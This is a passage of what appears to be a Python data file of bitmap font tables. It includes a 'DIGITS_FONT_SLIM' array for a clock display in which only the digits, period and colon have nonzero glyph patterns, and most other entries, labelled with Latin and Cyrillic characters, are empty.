[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x94 Д
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x95 E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x96 Ж
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x97 З
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x98 И
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x99 Й
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9A K
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9B Л
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9C M
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9D H
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9E O
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9F П
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA0 P
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA1 C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA2 T
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA3 У
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA4 Ф
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA5 X
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA6 Ц
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA7 Ч
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA8 Ш
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA9 Щ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAA Ъ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAB Ы
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAC Э
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAD Ь
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAE Ю
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xAF Я
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB0 a
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB1 б
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB2 в
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB3 г
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB4 д
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB5 e
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB6 ж
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB7 з
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB8 и
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xB9 й
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBA к
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBB л
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBC м
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBD н
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBE o
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xBF п
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xC9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCD
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xCF
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xD9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDD
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xDF
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xE9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xED
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xEF
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF0
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF1
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF2
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF3
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF4
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF5
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF6
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF7
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF8
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xF9
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFA
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFB
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFC
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFD
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFE
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xFF
]
#: Bit patterns for the pilotClock Digits like 7-segments, font height = 10
DIGITS_FONT_SLIM = [
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x00
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x01
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x02
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x03
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x04
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x05
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x06
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x07
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x08
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x09
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0B
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0D
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x10
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x11
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x12
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x13
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x14
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x15
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x16
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x17
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x18
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x19
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1B
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1D
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ' '
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '!'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '"'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '#'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '$'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '%'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '&'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '''
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '('
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ')'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '*'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '+'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '-'
[0x0000, 0x0000, 0x0200, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '.'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '/'
[0x01FE, 0x0201, 0x0201, 0x0201, 0x0201, 0x01FE, 0x0000, 0x0000], # '0'
[0x0000, 0x0000, 0x0201, 0x03FF, 0x0200, 0x0000, 0x0000, 0x0000], # '1'
[0x03E1, 0x0211, 0x0211, 0x0211, 0x0211, 0x020E, 0x0000, 0x0000], # '2'
[0x0201, 0x0211, 0x0211, 0x0211, 0x0211, 0x01EE, 0x0000, 0x0000], # '3'
[0x001F, 0x0010, 0x0010, 0x0010, 0x0010, 0x03FF, 0x0000, 0x0000], # '4'
[0x021F, 0x0211, 0x0211, 0x0211, 0x0211, 0x01E1, 0x0000, 0x0000], # '5'
[0x01FE, 0x0211, 0x0211, 0x0211, 0x0211, 0x01E0, 0x0000, 0x0000], # '6'
[0x0001, 0x0001, 0x0001, 0x0001, 0x0001, 0x03FF, 0x0000, 0x0000], # '7'
[0x01EE, 0x0211, 0x0211, 0x0211, 0x0211, 0x01EE, 0x0000, 0x0000], # '8'
[0x000E, 0x0211, 0x0211, 0x0211, 0x0211, 0x01FE, 0x0000, 0x0000], # '9'
[0x0000, 0x0000, 0x0084, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ':'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ';'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '<'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '='
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '>'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '?'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '@'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'A'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'B'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'C'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'D'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'E'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'F'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'G'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'H'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'I'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'J'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'K'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'L'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'M'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'N'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'O'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'P'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'Q'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'R'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'S'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'T'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'U'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'V'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'W'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'X'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'Y'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'Z'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '['
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # backslash
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '^'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '_'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '`'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'a'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'b'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'c'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'd'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'e'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'f'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'g'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'h'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'i'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'j'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'k'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'l'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'm'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'n'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'o'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'p'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'q'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'r'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 's'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 't'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'u'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'v'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'w'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'x'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'y'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'z'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '{'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '|'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '}'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '~'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x7F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x80 p
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x81 c
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x82 т
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x83 у
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x84 ф
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x85 x
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x86 ц
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x87 ч
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x88 ш
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x89 щ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8A ъ
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8B ы
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8C ь
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8D э
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8E ю
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x8F я
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x90 A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x91 Б
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x92 В
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x93 Г
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x94 Д
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x95 E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x96 Ж
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x97 З
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x98 И
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x99 Й
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9A K
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9B Л
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9C M
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9D H
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9E O
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x9F П
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA0 P
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA1 C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0xA2 T
